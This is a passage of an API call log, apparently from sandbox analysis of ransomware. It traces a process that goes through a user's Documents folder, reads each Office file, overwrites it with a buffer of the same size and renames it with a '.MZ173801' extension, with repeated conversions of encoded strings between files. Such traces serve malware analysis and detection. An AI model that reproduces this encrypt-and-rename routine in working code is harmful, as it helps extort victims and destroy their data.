cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.565] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.566] GetCurrentThreadId () returned 0x1358 [0121.566] GetCurrentThreadId () returned 0x1358 [0121.566] GetCurrentThreadId () returned 0x1358 [0121.566] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\mXllPiyuRFE.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\mxllpiyurfe.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.566] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.566] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.566] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x12bdd [0121.566] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.566] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x12bdd, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x12bdd, lpOverlapped=0x0) returned 1 [0121.567] CloseHandle (hObject=0x3fc) returned 1 [0121.569] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\mXllPiyuRFE.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\mxllpiyurfe.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.672] WriteFile (in: hFile=0x3fc, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x12bdd, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0x12bdd, lpOverlapped=0x0) returned 1 [0121.674] CloseHandle (hObject=0x3fc) returned 1 [0121.677] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\mXllPiyuRFE.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\mxllpiyurfe.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\mXllPiyuRFE.pptx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\mxllpiyurfe.pptx.mz173801")) returned 1 [0121.677] GetCurrentThreadId () returned 0x1358 [0121.677] GetCurrentThreadId () returned 0x1358 [0121.677] GetCurrentThreadId () returned 0x1358 [0121.678] GetCurrentThreadId () returned 0x1358 [0121.678] GetCurrentThreadId () returned 0x1358 [0121.678] GetCurrentThreadId () returned 0x1358 [0121.678] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0121.678] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0121.678] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0121.678] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0121.678] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x5ee892ad, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x5ee892ad, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0121.678] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba171700, ftCreationTime.dwHighDateTime=0x1d5c11f, ftLastAccessTime.dwLowDateTime=0xb1876b10, ftLastAccessTime.dwHighDateTime=0x1d59dae, ftLastWriteTime.dwLowDateTime=0xb1876b10, ftLastWriteTime.dwHighDateTime=0x1d59dae, nFileSizeHigh=0x0, nFileSizeLow=0x42ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oY9NI6W.xlsx", cAlternateFileName="OY9NI6~1.XLS")) returned 1 [0121.678] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.678] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.678] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\oY9NI6W.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\oy9ni6w.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba171700, ftCreationTime.dwHighDateTime=0x1d5c11f, ftLastAccessTime.dwLowDateTime=0xb1876b10, ftLastAccessTime.dwHighDateTime=0x1d59dae, ftLastWriteTime.dwLowDateTime=0xb1876b10, ftLastWriteTime.dwHighDateTime=0x1d59dae, nFileSizeHigh=0x0, nFileSizeLow=0x42ad)) returned 1 [0121.678] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.678] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.679] GetCurrentThreadId () returned 0x1358 [0121.679] GetCurrentThreadId () returned 0x1358 [0121.679] GetCurrentThreadId () returned 0x1358 [0121.679] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.808] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.809] GetCurrentThreadId () returned 0x1358 [0121.809] GetCurrentThreadId () returned 0x1358 [0121.809] GetCurrentThreadId () returned 0x1358 [0121.809] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\oY9NI6W.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\oy9ni6w.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.809] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.809] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.809] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x42ad [0121.809] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.809] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x42ad, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x42ad, lpOverlapped=0x0) returned 1 [0121.810] CloseHandle (hObject=0x3fc) returned 1 [0121.811] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\oY9NI6W.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\oy9ni6w.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.812] WriteFile (in: hFile=0x3fc, lpBuffer=0x2437b60*, nNumberOfBytesToWrite=0x42ad, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2437b60*, lpNumberOfBytesWritten=0x19f9bc*=0x42ad, lpOverlapped=0x0) returned 1 [0121.813] CloseHandle (hObject=0x3fc) returned 1 [0121.814] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\oY9NI6W.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\oy9ni6w.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\oY9NI6W.xlsx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\oy9ni6w.xlsx.mz173801")) returned 1 [0121.815] GetCurrentThreadId () returned 0x1358 [0121.815] GetCurrentThreadId () returned 0x1358 [0121.815] GetCurrentThreadId () returned 0x1358 [0121.815] GetCurrentThreadId () returned 0x1358 [0121.815] GetCurrentThreadId () returned 0x1358 [0121.815] GetCurrentThreadId () returned 0x1358 [0121.815] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x766b0710, ftCreationTime.dwHighDateTime=0x1d5ab1b, ftLastAccessTime.dwLowDateTime=0x1bc4c720, ftLastAccessTime.dwHighDateTime=0x1d56ff1, ftLastWriteTime.dwLowDateTime=0x1bc4c720, ftLastWriteTime.dwHighDateTime=0x1d56ff1, nFileSizeHigh=0x0, nFileSizeLow=0x423b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="s89GGesFpGwDjBj.docx", cAlternateFileName="S89GGE~1.DOC")) returned 1 [0121.815] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.815] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.815] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\s89GGesFpGwDjBj.docx" (normalized: "c:\\users\\fd1hvy\\documents\\s89ggesfpgwdjbj.docx"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x766b0710, ftCreationTime.dwHighDateTime=0x1d5ab1b, ftLastAccessTime.dwLowDateTime=0x1bc4c720, ftLastAccessTime.dwHighDateTime=0x1d56ff1, ftLastWriteTime.dwLowDateTime=0x1bc4c720, ftLastWriteTime.dwHighDateTime=0x1d56ff1, nFileSizeHigh=0x0, nFileSizeLow=0x423b)) returned 1 [0121.816] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.816] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 